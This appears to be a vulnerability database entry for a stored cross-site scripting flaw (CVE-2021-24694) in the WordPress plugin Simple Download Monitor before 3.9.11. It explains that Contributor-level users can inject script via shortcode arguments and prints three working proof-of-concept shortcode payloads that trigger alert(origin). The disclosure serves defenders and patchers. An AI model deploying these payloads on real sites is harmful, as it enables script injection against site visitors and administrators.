Lucene search
Apple502jWPEX-ID:9D0D8F8C-F8FB-457F-B557-255A052CCC32HistoryDec 21, 2021 - 12:00 a.m.
Simple Download Monitor < 3.9.11 - Contributor+ Stored Cross-Site Scripting via Shortcodes
2021-12-2100:00:00
apple502j
79
download monitor
cross-site scripting
stored xss
shortcodes
EPSS
0.001
Percentile
24.8%
The plugin could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attack via 1) “color” or “css_class” argument of sdm_download shortcode, 2) “class” or “placeholder” argument of sdm_search_form shortcode.
// all spaces must be replaced with a slash
[sdm_download id="replace-with-real-download-post-id" color='"/style="animation-name:twentytwentyone-close-button-transition"/onanimationend="alert(origin)']
// fancy=2 or 3 also works
[sdm_download id="599" fancy="1" css_class='"style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(origin+2)']
[sdm_search_form class='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(origin)' placeholder='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(origin+2)']Related
patchstack
patchstack
wpvulndb
wpvulndb
cve
cve
CVE-2021-24694
2022-01-24 08:15:08
cnvd
cnvd
WordPress Simple Download Monitor plugin cross-site scripting vulnerability
2022-01-26 00:00:00
prion
prion
Cross site scripting
2022-01-24 08:15:00
nvd
nvd
CVE-2021-24694
2022-01-24 08:15:08
cvelist
cvelist